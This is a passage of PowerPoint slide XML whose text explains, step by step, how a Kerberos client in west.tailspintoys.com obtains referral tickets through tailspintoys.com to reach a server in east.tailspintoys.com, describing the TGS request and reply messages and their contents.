              <a:t>The name of the target computer.</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="1200" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>The name of the target computer's domain.</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="1200" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>A TGT for admission to the KDC in west.tailspintoys.com.</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="1200" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>An authenticator encrypted with the TGS session key the user shares with that KDC.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="de-DE" sz="1200" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="+mj-lt"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>The Kerberos client compares the location with its own workstation's domain. Because they are different, the client sets a flag in the KDC Options field of the KRB_TGS_REQ message for NAME_CANONICALIZE, which indicates to the KDC that server might be in another realm. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="900" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="228600" lvl="0" indent="-228600">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="2"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>The user's local KDC (for west.tailspintoys.com) receives the KRB_TGS_REQ and sends back a referral ticket for tailspintoys.com. The local KDC: </a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="1200" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="335752" lvl="1" indent="-228600">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Notes the flag setting.</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="1200" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="335752" lvl="1" indent="-228600">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Verifies the user's TGT.</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="1200" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="335752" lvl="1" indent="-228600">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Looks up the path to the server—in this case, a computer object in east.tailspintoys.com.</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="1200" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="335752" lvl="1" indent="-228600">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Builds a tree of known domains until it has a structure including east.tailspintoys.com.</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="1200" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="335752" lvl="1" indent="-228600">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Queries LSA for a trust list.</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="1200" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="335752" lvl="1" indent="-228600">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Constructs the shortest path between its domain and east.tailspintoys.com based on the domain tree and the trust list.</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="1200" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="335752" lvl="1" indent="-228600">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Constructs a new TGT for the user.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="335752" lvl="1" indent="-228600">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Constructs a KRB_TGS_REP message containing these four items:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="107152" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="900" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="107152" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Unless there is a direct trust between west.tailspintoys.com and east.tailspintoys.com (which there is not in this example), the TGT is issued for the next intervening domain along the shortest path to east.tailspintoys.com. In this example, the next intervening domain is tailspintoys.com.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>The TGT also has a referral flag set, so the KDC will be informed that the KRB_TGS_REQ is coming from another realm. This flag also tells the KDC to fill in the Transited Realms field.</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="1200" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="900" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="441581" lvl="1" indent="-228600">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="alphaLcPeriod" startAt="8"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Constructs a KRB_TGS_REP message containing these four items:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>A TGT for tailspintoys.com, encrypted with the inter-realm key shared between west.tailspintoys.com and tailspintoys.com.</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="900" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>A session key for the user to share with the KDC in tailspintoys.com, encrypted with the user's TGS session key.</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="900" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>A pre-authentication field data type of KERB-PA-SERV-REFERRAL, which tells the user's Kerberos client that the enclosed ticket is a referral TGT.</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="900" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Pre-authentication data (the realm name for the referral — in this case, tailspintoys.com).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" sz="900" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="228600" lvl="0" indent="-228600">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="3"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>The user's Kerberos client receives the KRB_TGS_REP and sends KRB_TGS_REQ to the KDC in tailspintoys.com. The Kerberos client: </a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="1200" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Notes that this is a referral and gets the referral realm (tailspintoys.com).</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="1200" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="335752" lvl="1" indent="-228600">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Sends a KRB_TGS_REQ message to a KDC in tailspintoys.com with the TGT, the NAME_CANONICALIZE flag set, and a request for a service ticket to server.</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="1200" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRP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message includes:</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="1200" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>The name of the target computer.</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="1200" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>The name of the target computer's domain.</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="1200" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>A TGT for admission to the KDC in tailspintoys.com.</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="1200" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>An authenticator encrypted with the session key the user shares with that KDC.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="107152" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="900" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="122771" lvl="0" indent="-228600">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="4"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>A KDC in tailspintoys.com goes through the same process as the KDC in west.tailspintoys.com, returning a TGT for east.tailspintoys.com in a TGS referral to the user.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="122771" lvl="0" indent="-228600">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="4"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="900" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="122771" marR="0" lvl="0" indent="-228600" algn="l" defTabSz="914363" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="333"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="4"/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>The user's Kerberos client sends a KRB_TGS_REQ along with the TGT it received from the tailspintoys.com KDC to a KDC in east.tailspintoys.com.</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="900" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="122771" marR="0" lvl="0" indent="-228600" algn="l" defTabSz="914363" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="333"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="4"/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="de-DE" sz="900" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="122771" marR="0" lvl="0" indent="-228600" algn="l" defTabSz="914363" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="333"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="+mj-lt"/>
